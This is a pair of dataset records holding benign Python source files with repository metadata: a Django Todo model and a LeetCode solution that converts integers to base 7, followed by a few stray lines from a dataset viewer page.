8bc9ba267ab55211234f1b8531b5d213ec6c7238 | 2315afb8435de656afcc5789ec1ddde21135f658 | /todo_project/todo_app/models.py | dbe2eb3e5521a50750030086908baa842542c537 | [] | no_license | DeanDupalov/Front-End-Basics | 9754315cce8417cb86fbe33c76886df70e9d8ea4 | acac5b03f55aff03620bd2d527a96c0d453e07d9 | refs/heads/master | 2023-04-22T08:58:28.124375 | 2021-05-13T13:11:18 | 2021-05-13T13:11:18 | 357,648,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | from django.db import models
# Create your models here.
class Todo(models.Model):
title = models.CharField(max_length=10)
description = models.TextField(max_length=100)
is_done = models.BooleanField(default=False)
def __str__(self):
return self.title
| [
"[email protected]"
] | |
48887c30ff50b09604e6af7c99af845d18f9c3aa | 8dca64dd11b23a7d59413ac8e28e92a0ab80c49c | /504. Base 7/solution.py | 298b59aa9f66b91ba715bc108c1bf1b2171775ae | [] | no_license | huangruihaocst/leetcode-python | f854498c0a1d257698e10889531c526299d47e39 | 8f88cae7cc982ab8495e185914b1baeceb294060 | refs/heads/master | 2020-03-21T20:52:17.668477 | 2018-10-08T20:29:35 | 2018-10-08T20:29:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | class Solution(object):
def convertToBase7(self, num):
"""
:type num: int
:rtype: str
"""
if -6 <= num <= 6:
return str(num)
def helper(n): # n >= 7
li = list()
while n >= 7:
li.append(n % 7)
n //= 7
li.append(n)
return ''.join(map(str, li[::-1]))
if num >= 0:
return helper(num)
else:
return '-' + helper(-num)
if __name__ == '__main__':
s = Solution()
print(s.convertToBase7(-7))
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.